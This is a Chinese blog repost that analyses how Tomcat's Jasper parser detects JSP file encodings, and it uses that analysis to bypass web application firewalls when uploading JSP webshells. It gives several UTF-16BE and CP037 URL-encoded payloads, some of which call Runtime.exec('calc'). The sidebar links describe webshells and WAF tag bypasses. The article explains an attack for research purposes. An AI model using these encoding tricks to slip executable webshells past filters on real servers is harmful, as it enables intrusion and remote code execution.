jsp 使用了impot还是导不出_WAF Bypass之wesbhell上传jsp与tomcat

最新推荐文章于 2022-08-20 21:20:28 发布
最新推荐文章于 2022-08-20 21:20:28 发布
阅读量141 收藏
点赞数
文章标签: jsp 使用了impot还是导不出 谷歌不解析jsp

6960fb34e2d87a5ce45e16835b75c0eb.png

1,开个头

WAF Bypass之webshell上传jsp与tomcat

事情是这样的,某一天,笔者闲着无聊,对着Tomcat的示例文件到处点点,希望寻找出点什么,意外发现Tomcat的示例文件中一些有趣的示例。 ddfe3f4913a7bc19dd90e145085a60f3.png 随后笔者翻开Tomcat的解析代码,对其进行了一番静态代码审阅,果然有蹊跷,后面又调试看了看。  2,代码要点解析 对于脚本jsp文件,会通过EncodingDetector进行字符集类型的探测,该处代码要点较多,也是主逻辑,所以整片代码放上来了。 apache-tomcat-9.0.35/lib/jasper.jar!/org/apache/jasper/compiler/ParserController.class:determineSyntaxAndEncoding fb48fae202ce7e422fea4893118e34d0.png 编码探测过程在该类初始化方法中进行,首先会使用processBom方法,根据文件的前4个字节探测字符集类型,这里的代码和xerces的Magic Charset中的字符集类型探测代码有着异曲同工之妙…;之后会使用getPrologEncoding方法尝试获取文件的declare charset,declare charset优先级高于magic charset。 apache-tomcat-9.0.35/lib/jasper.jar!/org/apache/jasper/compiler/EncodingDetector.class f9dabd75d9ec08b8486051e3e753a152.png processBom方法会调用parseBom方法根据文件头4个字节返回字符集类型: aee1706262a459b62da27d290177b508.png getPrologEncoding将文件流传入xml解析,底层还是用的xerces,如果编码类型为xerces不支持的,这里会暂时忽略掉异常。 a8b4d8a4361851bebda2067b3a75478b.png 但并非processBom或getPrologEncoding得到的字符集就能被成功,后续创建字符流读取器会检查自身是否支持这些字符集。 这一步中也会做字符集别名的映射查找,一番操作过后,如果该字符集未读取器不支持的,最后会抛出异常。如UTF-32BE字符集,在getPrologEncoding方法中会抛出异常(不支持),在processBom中虽然不会抛出异常,但是其过程中得到的字符集名称为ISO-10646-UCS-4。而在InputStreamReader中不支持该字符集,也无别名映射(想想也是,ISO-10646-UCS-4这个名字根本也无法判断大端小端,而且代码流程中也没有传递大小端这一变量)。 jdk1.8.0_191/src.zip!/java/nio/charset/Charset.java 8d1481426ad73bc53780593a2302b6a9.png ParserController.class:determineSyntaxAndEncoding方法中,如果文件没有带BOM,会触发getPageEncodingForJspSyntax函数流程 apache-tomcat-9.0.30-src/java/org/apache/jasper/compiler/ParserController.java,getPageEncodingForJspSyntax 5a761975ba292d9a2ff113cbf6813060.png 从代码来看,指令标签有好几种:
声明字符编码的方式至少有两种: 
pageEncoding="UTF-16be"
contentType="charset=utf-16be"
 3,实战讲解

3.1 charset

通过阅读代码流程,我们可以得到如下表格,该表格用于Magic Charset方法,而XML的Declare Charset也可以使用,笔者在这里就不再描述了,参考笔者的关于xerces解析的文章即可  WAF Bypass之xerces解析

313230f6b12ca7f997c46a1491f1bbdb.png

有如下原始JSP文件,jsp_xml.jsp: 
<?xml version="1.0" encoding="UTF-8"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"><jsp:directive.page contentType="text/html"/><jsp:declaration>jsp:declaration><jsp:scriptlet>out.write("I'm turn1tup!");jsp:scriptlet><jsp:text>jsp:text>jsp:root>
使用UTF-16BE字符集进行编码: 
%00%3C%00%3F%00x%00m%00l%00%20%00v%00e%00r%00s%00i%00o%00n%00%3D%00%22%001%00.%000%00%22%00%20%00e%00n%00c%00o%00d%00i%00n%00g%00%3D%00%22%00U%00T%00F%00-%001%006%00b%00e%00%22%00%3F%00%3E%00%0A%00%3C%00j%00s%00p%00%3A%00r%00o%00o%00t%00%20%00x%00m%00l%00n%00s%00%3A%00j%00s%00p%00%3D%00%22%00h%00t%00t%00p%00%3A%00/%00/%00j%00a%00v%00a%00.%00s%00u%00n%00.%00c%00o%00m%00/%00J%00S%00P%00/%00P%00a%00g%00e%00%22%00%0A%00%20%00%20%00v%00e%00r%00s%00i%00o%00n%00%3D%00%22%001%00.%002%00%22%00%3E%00%0A%00%3C%00j%00s%00p%00%3A%00d%00i%00r%00e%00c%00t%00i%00v%00e%00.%00p%00a%00g%00e%00%20%00c%00o%00n%00t%00e%00n%00t%00T%00y%00p%00e%00%3D%00%22%00t%00e%00x%00t%00/%00h%00t%00m%00l%00%22%00/%00%3E%00%0A%00%3C%00j%00s%00p%00%3A%00d%00e%00c%00l%00a%00r%00a%00t%00i%00o%00n%00%3E%00%0A%00%3C%00/%00j%00s%00p%00%3A%00d%00e%00c%00l%00a%00r%00a%00t%00i%00o%00n%00%3E%00%0A%00%3C%00j%00s%00p%00%3A%00s%00c%00r%00i%00p%00t%00l%00e%00t%00%3E%00%0A%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%0A%00%3C%00/%00j%00s%00p%00%3A%00s%00c%00r%00i%00p%00t%00l%00e%00t%00%3E%00%0A%00%3C%00j%00s%00p%00%3A%00t%00e%00x%00t%00%3E%00%0A%00%3C%00/%00j%00s%00p%00%3A%00t%00e%00x%00t%00%3E%00%0A%00%3C%00/%00j%00s%00p%00%3A%00r%00o%00o%00t%00%3E%00%0A
使用CP037进行编码: 
Lo%A7%94%93%40%A5%85%99%A2%89%96%95%7E%7F%F1K%F0%7F%40%85%95%83%96%84%89%95%87%7E%7F%83%97%F0%F3%F7%7Fon%25L%91%A2%97z%99%96%96%A3%40%A7%94%93%95%A2z%91%A2%97%7E%7F%88%A3%A3%97zaa%91%81%A5%81K%A2%A4%95K%83%96%94a%D1%E2%D7a%D7%81%87%85%7F%25%40%40%A5%85%99%A2%89%96%95%7E%7F%F1K%F2%7Fn%25L%91%A2%97z%84%89%99%85%83%A3%89%A5%85K%97%81%87%85%40%83%96%95%A3%85%95%A3%E3%A8%97%85%7E%7F%A3%85%A7%A3a%88%A3%94%93%7Fan%25L%91%A2%97z%84%85%83%93%81%99%81%A3%89%96%95n%25La%91%A2%97z%84%85%83%93%81%99%81%A3%89%96%95n%25L%91%A2%97z%A2%83%99%89%97%A3%93%85%A3n%25%96%A4%A3K%A6%99%89%A3%85M%7F%C9%7D%94%40%A3%A4%99%95%F1%A3%A4%97Z%7F%5D%5E%25La%91%A2%97z%A2%83%99%89%97%A3%93%85%A3n%25L%91%A2%97z%A3%85%A7%A3n%25La%91%A2%97z%A3%85%A7%A3n%25La%91%A2%97z%99%96%96%A3n%25
编码方式可参考  https://github.com/turn1tup/scripts/blob/master/charset_test.py  :

5724b38aef07553360c4edd2c6295379.png

对于以下代码,我们也可以对其进行编码 
out.write("I/'m turn1tup!");  %>
使用UTF-16BE编码,需带BOM标识: 
%FE%FF%00%3C%00%25%00%20%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%20%00%25%00%3E

3.2 XML特性

参考文章  WAF Bypass之xerces解析 ,这里举一些例子: 
<?xml version="1.0" encoding="UTF-8"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"><jsp:directive.page contentType="text/html"/><jsp:declaration>jsp:declaration><jsp:scriptlet>u("I'm turn1tup!");jsp:scriptlet><jsp:text>jsp:text>jsp:root>
HTML实体编码,包括16进制、10进制、字符实体: 
<?xml version="1.0" encoding="UTF-8"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"><jsp:directive.page contentType="text/html"/><jsp:declaration>jsp:declaration><jsp:scriptlet>out.write("I'm turn1tup!");jsp:scriptlet><jsp:text>jsp:text>jsp:root>

2.3 PageEncoding

指令标签 
"charset=utf-16be" %>%00%3C%00%25%00%20%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%20%00o%00u%00t%00.%00p%00r%00i%00n%00t%00%28%00R%00u%00n%00t%00i%00m%00e%00.%00g%00e%00t%00R%00u%00n%00t%00i%00m%00e%00%28%00%29%00.%00e%00x%00e%00c%00%28%00%22%00c%00a%00l%00c%00%22%00%29%00%29%00%3B%00%20%00%25%00%3E
指令标签 方式 
"charset=utf-16be"/>%00%3C%00%25%00%20%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%20%00o%00u%00t%00.%00p%00r%00i%00n%00t%00%28%00R%00u%00n%00t%00i%00m%00e%00.%00g%00e%00t%00R%00u%00n%00t%00i%00m%00e%00%28%00%29%00.%00e%00x%00e%00c%00%28%00%22%00c%00a%00l%00c%00%22%00%29%00%29%00%3B%00%20%00%25%00%3E
PageEncoding声明方式 
"utf-16be"/>%00%3C%00%25%00%20%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%20%00o%00u%00t%00.%00p%00r%00i%00n%00t%00%28%00R%00u%00n%00t%00i%00m%00e%00.%00g%00e%00t%00R%00u%00n%00t%00i%00m%00e%00%28%00%29%00.%00e%00x%00e%00c%00%28%00%22%00c%00a%00l%00c%00%22%00%29%00%29%00%3B%00%20%00%25%00%3E
标签的位置也可以变化: 
%00%3C%00%25%00%20%00o%00u%00t%00.%00w%00r%00i%00t%00e%00%28%00%22%00I%00%27%00m%00%20%00t%00u%00r%00n%001%00t%00u%00p%00%21%00%22%00%29%00%3B%00%20%00o%00u%00t%00.%00p%00r%00i%00n%00t%00%28%00R%00u%00n%00t%00i%00m%00e%00.%00g%00e%00t%00R%00u%00n%00t%00i%00m%00e%00%28%00%29%00.%00e%00x%00e%00c%00%28%00%22%00c%00a%00l%00c%00%22%00%29%00%29%00%3B%00%20%00%25%00%3E"charset=utf-16be"
4,结语 好吧,还是有点意思。 fa052f2c9f138dc317290f8cab3524c7.png

精彩直播预告

14637ee962bb33c9b61213e9e0afc535.png

080ec7f8b73dc7a4ccb7e3501e74e9c0.png

- End -

精彩推荐

T3反序列化 Weblogic12.2.1.4.0 JNDI注入

小妹妹,我想握着你的手,不为别的,只为给你讲清楚CVE-2020-5902

我是如何在4小时之内发现unc0ver越狱利用的0-day漏洞

源海拾贝 | 如何半天玩转一个“ES未授权利用”插件

080ec7f8b73dc7a4ccb7e3501e74e9c0.png

f29b45b56883bd25bd62fc6ca9bd0cee.gif

觉得内容不错就点个“在看”吧!

b266a2bca8273cffc3eddac674d03847.png
weixin_39933438
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JavaWeb项目org.apache.jasper.JasperException: 解决方法
渴望飞的鱼的博客
02-03 7万+
description The server encountered an internal error () that prevented it from fulfilling this request.exceptionorg.apache.jasper.JasperException: /PCManage/controlsecletthenews.jsp(303,12) The function getNid must be used with a prefix when a default name
jsp页面返回404现象,tomcat日志提示org.apache.jasper.compiler.Compiler.removeGeneratedClassFiles Failed
我的博客
06-05 347
1.原因:因为用户权限的问题,tomcat在编译jsp时,要删除旧的class和java文件,但是如果旧的文件是由另一个用户生成的,就没有权限删除,自然也无法生成新的class和java文件。所以也无法访问。 ...
文件上传漏洞之安恒玄武盾的一些绕过方法技巧
weixin_50464560的博客
08-20 1286
转载https://xz.aliyun.com/t/11607。
JSP指令标识之page指令
haofengjiao的博客
04-15 991
一.import1.等同import语句 <%@ page import="java.util.*" %> <%@ page import="java.util.*, java.net.*" %>2.在一个JSP页面中可以给出多个page指令,而且import是可以重复出现的<%@ page import="java.util.*" %> <%@ page import="java.next.*"
使用idea测试maven项目环境 出现错误:org.apache.jasper.JasperException: Unable to compile class for JSP:
zjq_1234的博客
02-11 3825
使用的JDK版本为1.8,maven中刚开始没配置Tomcat使用maven默认的Tomcat6,出现如下错误 错误信息: type Exception report message description The server encountered an internal error () that prevented it from fulfilling this request....
Tomcat版本号问题导致的JSP访问异常
lkforce
02-14 3395
出现问题: 项目在Windows系统下用Ant打包。 在Linux下启动Tomcat,访问项目的Jsp页面时报错,而且每次访问时报错还不一样,有三种情况: 有这样的: HTTP Status 500 – Internal Server Error Type Exception Report Message javax.servlet.ServletException: java.la...
AS下arr文件的打包及使用
08-26
里面有两个项目,其中TestArr为打包arr文件,UseArr为测试之前打包出来的arr
ImportExport.rar
05-10
Fiddler导出jmx文件最好用插件,实现类似于loadrunner录制功能,结合jmeter增加comment的方式方法,快速实现JMeter脚本编制
diea 快捷键
06-28
Java 编辑器 idea 快捷键说明文档,Java 编辑器 idea 快捷键说明文档,Java 编辑器 idea 快捷键说明文档,Java 编辑器 idea 快捷键说明文档,
在TensorFlow中屏蔽warning的方式
01-20
TensorFlow的日志级别分为以下三种: TF_CPP_MIN_LOG_LEVEL = 1 //默认设置,为显示所有信息 TF_CPP_MIN_LOG_LEVEL = 2 //只显示error和warining信息 ...impot os os.environ[TF_CPP_MIN_LOG_LEVEL] = 2 二、lin
open-moulinette:清理开放数据的脚本
05-02
开放式磨房 开放数据通常没有适当的格式。 在这种情况下,像我们这样的黑客需要付出一些努力才能将其清除。 每个文件夹包含: ... impot_locaux将从城市级别的地方税收要素中下载所有文件。 仪表盘 我
两个JSP Web Shell
03-23
NULL 博文链接:https://sheng.iteye.com/blog/1033770
JSPWEBSHELL源代码
11-21
上传或是用其他方式注入到别人系统,用此webshell攻击别人系统,提供各种网络协议的连接
org.apache.jasper.compiler.JDTCompiler$1.findType Compilation error
qq_45887317的博客
02-27 3009
org.apache.jasper.compiler.JDTCompiler$1.findType Compilation error IDEA加载数据库驱动失败 网上全都在说可能存在两个原因1、tomcat版本太低;2、jdk版本太高 我跟着网上改了jdk但是没有用,依旧报错 后来发现IDEA里面可以直接改,右上角 然后在这里修改低一点的jre版本就好了 ...
jsp无法编译java_org.apache.jasper.JasperException:无法编译JSP的类:
weixin_33252145的博客
02-28 1575
动态包含并传递参数出错:org.apache.jasper.JasperException:无法编译JSP的类:在jsp文件中的第[9]行发生错误:[/includedemo/include_demo03.jsp]用户名无法解析为变量6: head>7:8:动态包含并传递参数 h1>9:10:”/>11:12: jsp:include>堆栈跟踪:org.apache.jas...
waf绕过之标签绕过
weixin_50464560的博客
10-15 911
在内容绕过waf拦截上,一般有两种思路。 第一种是在代码上想办法,各种混淆代码,或者放弃特征明显的eval,使用特征不那么明显的命令执行,远程文件包含,文件上传,反序列化。 但有的waf会直接从脚本文件的标签特征上下手,这个时候就需要用到第二种办法,使用脚本文件的特性来规避标签特征。 1, php特殊标签 1 <?php phpinfo();?> 2 <script language='php'>phpinfo();</script> 3 <?=phpinfo()?
JavaWeb 访问JSP报错解决--org.apache.jasper.compiler.Compiler generateClass
张璟冰的博客
04-16 2057
如果你在访问JSP文件的时候报以下错误: org.apache.jasper.compiler.Compiler generateClass 你可以现在你的idea 里面找到 File—>Project Structure ,系统弹出以下提示框 依次判断这两个位置是否提示 No SDK 的提示如果有,就要去官网下载sdk了。 如果没有以下提示,则可以打开命令提示符 输入java -ver...
jsp文件上传_文件上传
weixin_39751453的博客
12-03 714
一、文件上传的目的——脚本文件文件上传的一共可造成三种危害,从低到高分别是,任意内容文件,html文件,脚本文件。任意内容文件任意内容文件指的是虽然文件后缀不可控,但是文件内容可控,比如我可以上传一个内容为的jpg文件。这种是未校验文件头和文件内容导致的,往往不被视为漏洞,使用它们通常需要其他漏洞结合利用,比如php cgi解析漏洞,文件包含漏洞,结合任意目录上传覆盖正常文件。html文...
The impot javafx cannot be resolved
最新发布
04-02
As an AI language model, I cannot see your code, but here are some possible solutions to resolve the "import javafx cannot be resolved" error: 1. Make sure that you have installed the JavaFX library ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值